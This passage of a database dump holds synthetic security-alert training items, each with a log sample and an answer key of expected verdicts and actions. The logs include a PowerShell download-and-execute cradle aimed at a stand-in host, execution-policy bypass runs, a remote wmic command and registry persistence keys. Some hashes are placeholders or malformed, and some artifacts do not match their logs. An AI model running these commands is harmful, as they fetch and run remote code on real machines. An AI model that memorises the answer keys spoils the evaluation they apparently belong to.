1, 'Closed', 34, '{\"timestamp\":\"2023-10-05T14:22:35Z\",\"email_id\":\"1234567890\",\"from\":\"finance.partner@maliciousdomain.com\",\"to\":\"john.doe@company.com\",\"subject\":\"Urgent: Q3 Financial Report\",\"attachment\":\"Q3_Report.docm\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"url\":\"http://maliciousdomain.com/securelogin\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\"}', '2026-01-02 04:27:59', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"finance.partner@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing source\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious macro detected\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/securelogin\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Phishing URL targeting credentials\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Blacklist\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns\"}}],\"recommended_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL), (305, 'Suspicious PowerShell Execution', 'high', 'EDR', 'A PowerShell script was executed on the compromised system. This script is suspected to be used to establish a foothold and download additional malicious payloads. The execution follows a successful phishing attempt that targeted user john.doe.', 'Execution', 'T1059.001', 1, 'new', 34, '{\"timestamp\":\"2023-10-02T14:23:45Z\",\"event_id\":4688,\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -NoProfile -ExecutionPolicy Bypass -Command \\\"IEX(New-Object Net.WebClient).DownloadString(\'http://malicioussite.com/payload\')\\\"\",\"user\":\"john.doe\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"203.0.113.45\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"malicious_script.ps1\"}', '2026-01-02 04:27:59', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"This hash is associated with a known malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern matches known malicious script naming conventions.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account that was targeted during the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (306, 'Persistence Mechanism Established', 'high', 'Endpoint Logs', 'The attacker has established a persistence mechanism on the compromised system by creating a scheduled task and modifying registry keys. This ensures the malicious software remains active and reinitiates upon system restart.', 'Persistence', 'T1050 - New Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:00Z\",\"event_type\":\"registry and scheduled task modification\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"affected_user\":\"john.doe\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\maliciousApp\",\"scheduled_task\":{\"task_name\":\"SystemUpdater\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\taskhost.exe\",\"creation_time\":\"2023-10-12T14:40:00Z\"},\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}', '2026-01-02 04:27:59', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"Associated with known threat actor\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal workstation\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Valid user account\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by multiple AV engines as malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"taskhost.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Mimics legitimate Windows process\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (307, 'Unauthorized Lateral Movement Detected', 'high', 'Network Logs', 'The attacker used stolen credentials to move laterally across the network, probing for systems hosting geological data repositories. The lateral movement was detected from internal IP 192.168.1.15 to 192.168.1.20 using compromised credentials of user \'j.doe\'.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"1001\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"192.168.1.20\",\"username\":\"j.doe\",\"action\":\"Lateral Movement\",\"result\":\"Success\",\"external_ip\":\"203.0.113.45\",\"file_accessed\":\"\\\\\\\\192.168.1.20\\\\geodata\\\\confidential_report.docx\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\"}', '2026-01-02 04:27:59', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Target internal system hosting valuable data.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Compromised credentials used for lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP involved in credential theft.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this file hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL), (308, 'Data Exfiltration Attempt', 'high', 'Firewall', 'An attempt was detected to transfer sensitive geological data out of the corporate network. The attacker, believed to be APT34, is using encrypted channels to exfiltrate data to a command and control server.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"src_ip\":\"10.1.2.15\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"bytes_sent\":1048576,\"bytes_received\":512,\"filename\":\"geo_data_export.zip\",\"hash\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"username\":\"jdoe\",\"url\":\"https://malicious-c2.com/exfil\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"alert_id\":\"FW-EXFIL-20231015-001\"}', '2026-01-02 04:27:59', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT34 command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2ca1bb6c7e907d06dafe4687e579fce\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious file hash associated with data exfiltration tools\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://malicious-c2.com/exfil\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLhaus\",\"verdict\":\"malicious\",\"details\":\"URL associated with APT34\'s exfiltration operations\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"geo_data_export.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file likely to contain geological data\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"Legitimate user account, potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (313, 'Suspicious PowerShell Script Execution Detected', 'high', 'Endpoint', 'A PowerShell script was executed on a critical server with unusual parameters that could be indicative of a malicious payload or reconnaissance activity.', 'Process Execution', 'T1059.001', 1, 'investigating', NULL, '{\"timestamp\":\"2023-10-14T11:35:45Z\",\"hostname\":\"finance-server-03\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -File \\\\\\\\192.168.1.50\\\\share\\\\suspicious.ps1\",\"file_hash\":\"b5c0b187fe309af0f4d35982fd961d7e\",\"parent_process\":\"explorer.exe\",\"pid\":4567,\"ppid\":4123,\"integrity_level\":\"High\",\"network_connections\":\"None\",\"additional_info\":{\"script_block_logging\":\"Enabled\",\"module_logging\":\"Enabled\"}}', '2026-01-02 15:31:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"152.82.254.41\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 152.82.254.41 reported 141 times for malicious activity. Abuse confidence score: 89%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'), (314, 'Port Scanning Detected from External Source', 'medium', 'Network', 'Multiple connection attempts on increasing port numbers were detected from an IP address not previously seen, suggesting a potential reconnaissance attempt.', 'Network Anomaly', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2023-10-14T13:47:08Z\",\"src_ip\":\"185.32.184.76\",\"src_port\":4723,\"dest_ip\":\"172.16.0.10\",\"dest_ports\":[22,23,80,443,8080],\"protocol\":\"TCP\",\"packet_count\":50,\"byte_count\":11000,\"user_agent\":\"Mozilla/5.0\",\"geo_location\":{\"country\":\"Germany\",\"city\":\"Frankfurt\"},\"additional_info\":{\"as_number\":12345,\"as_org\":\"Example ISP\"}}', '2026-01-02 13:35:26', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"221.191.155.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 221.191.155.57 reported 235 times for malicious activity. Abuse confidence score: 89%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'NDR', 1, 0, 'OT_ICS'), (315, 'Malware Detected via Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious process \'malware.exe\' was executed on the host \'WORKSTATION-01\'. The process has been linked to a known malware campaign targeting enterprise environments.', 'Malware', 'T1059', 1, 'Closed', 54, '{\"timestamp\":\"2026-01-02T10:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.2\",\"hostname\":\"WORKSTATION-01\",\"username\":\"jane.doe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_path\":\"C:\\\\Users\\\\jane.doe\\\\malware.exe\"}', '2026-01-02 11:44:27', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as part of a well-known malware campaign.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.2\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP is part of the internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Username belongs to an internal employee.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a known malicious file indicates a real threat requiring immediate containment and investigation.\"}', 'Intermediate', 'NULL', 1, 0, NULL), (316, 'Phishing Attempt Detected via Malicious Email', 'medium', 'Proofpoint', 'An email containing a malicious URL was received by user \'john.smith\'. The URL is associated with credential harvesting attacks.', 'Phishing', 'T1566', 1, 'investigating', 34, '{\"timestamp\":\"2026-01-02T08:47:30Z\",\"event_type\":\"email_received\",\"email_sender\":\"no-reply@fakebank.com\",\"username\":\"john.smith\",\"url\":\"http://malicious-link.com/login\"}', '2026-01-02 14:22:02', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Email address is associated with recent phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing sites targeting user credentials.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Username belongs to an internal employee.\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a malicious URL in an email suggests a phishing attack aimed at harvesting credentials.\"}', 'Beginner', 'NULL', 1, 0, NULL), (317, 'Suspicious Email Detected with Potential Phishing URL', 'medium', 'Proofpoint', 'An email was received from a suspicious sender with a URL known for phishing activities. The email appears to be a spoofed message attempting to trick users into clicking the malicious link.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-02T08:34:22Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.12\",\"email_sender\":\"noreply@alerting-service.com\",\"domain\":\"alerting-service.com\",\"url\":\"http://malicious-phishing-link.com\",\"username\":\"john.doe\",\"hostname\":\"johns-pc\"}', '2026-01-02 11:43:28', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 23 times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"alerting-service.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-phishing-link.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with ongoing phishing campaign\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a known malicious URL and reports of phishing from the IP suggest this is a true positive.\"}', 'Beginner', 'EDR', 1, 0, 'GOVERNMENT'), (318, 'Excessive Login Failures from Known Internal Host', 'low', 'Wazuh', 'Multiple failed login attempts were detected from an internal IP address. The activity was flagged due to a high number of failures, but the source is an internal, known host.', 'Brute Force', 'T1110', 0, 'Closed', 54, '{\"timestamp\":\"2026-01-02T09:15:47Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.100\",\"username\":\"admin\",\"hostname\":\"internal-server\",\"failed_attempts\":15}', '2026-01-02 19:25:21', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal network address, no external reports\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"clean\",\"details\":\"Commonly used internal admin account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login failures originate from an internal IP address, indicating a potential misconfiguration or user error rather than a malicious attempt.\"}', 'Beginner', 'NULL', 1, 0, NULL), (319, 'Suspicious Email Detected', 'high', 'Email Gateway', 'APT10 begins the attack by sending spear-phishing emails to key employees of TechGlobal Inc., enticing them to click on a malicious link disguised as a legitimate business document.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:32:00Z\",\"email_id\":\"d3f4b5c6-7e89-4abc-de12-34567890fghj\",\"sender\":\"attacker@maliciousdomain.com\",\"recipient\":\"jane.doe@techglobal.com\",\"subject\":\"Important Business Document\",\"attachment\":\"Invoice_2023.pdf\",\"attachment_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"source_ip\":\"203.0.113.5\",\"internal_ip\":\"192.168.1.45\",\"url\":\"http://maliciousdomain.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"smtp_server\":\"smtp.techglobal.com\"}', '2026-01-02 20:23:41', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash is associated with malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"IP address involved in multiple phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Inspection Service\",\"verdict\":\"malicious\",\"details\":\"URL is associated with phishing activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"Invoice_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Name Patterns\",\"verdict\":\"suspicious\",\"details\":\"Common filename used in phishing emails.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (320, 'Unauthorized Application Execution', 'high', 'EDR', 'Following successful credential harvesting, the attacker uses the compromised accounts to execute malware on the target network, enabling remote access and further exploitation.', 'Malware', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:28:32Z\",\"event_id\":\"4624\",\"computer_name\":\"workstation-22.corp.local\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.57\",\"destination_ip\":\"10.0.0.45\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Temp\\\\malicious_script.ps1\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_name\":\"malicious_script.ps1\",\"action\":\"Create Process\"}', '2026-01-02 20:23:41', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Compromised user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (321, 'Persistence Mechanism Installed', 'high', 'Endpoint Security Logs', 'APT10 installed a persistence mechanism via registry modifications and scheduled tasks on the endpoint, ensuring continued access to the compromised systems. Detection of suspicious registry changes and scheduled tasks was noted.', 'Persistence', 'T1547', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T14:37:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.2.15\",\"username\":\"jdoe\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"filename\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\ScheduledTaskMalware\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event_type\":\"RegistryModification\",\"user_sid\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"process_name\":\"regedit.exe\"}', '2026-01-02 20:23:41', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known APT10 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\ScheduledTaskMalware\",\"is_critical\":true,\"osint_result\":{\"source\":\"EndpointSecurity\",\"verdict\":\"malicious\",\"details\":\"Malicious scheduled task linked to persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalDirectory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (322, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'With a foothold established, the attacker moves laterally within the network, using legitimate administrative tools to avoid detection while searching for valuable data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:25:36Z\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"192.168.1.150\",\"external_attacker_ip\":\"203.0.113.45\",\"username\":\"admin_jdoe\",\"used_tool\":\"wmic\",\"command\":\"wmic /node:192.168.1.150 process call create \'cmd.exe /c whoami\'\",\"file_hash\":\"3f1d0f1e2a2b3c4d5e6f7a8b9c0d1e2f3g4h5i6j\",\"detected_protocol\":\"SMB\",\"log_type\":\"network_traffic\"}', '2026-01-02 20:23:41', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of potential compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address targeted for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Known administrative account used in lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f1d0f1e2a2b3c4d5e6f7a8b9c0d1e2f3g4h5i6j\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash of a tool commonly used for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 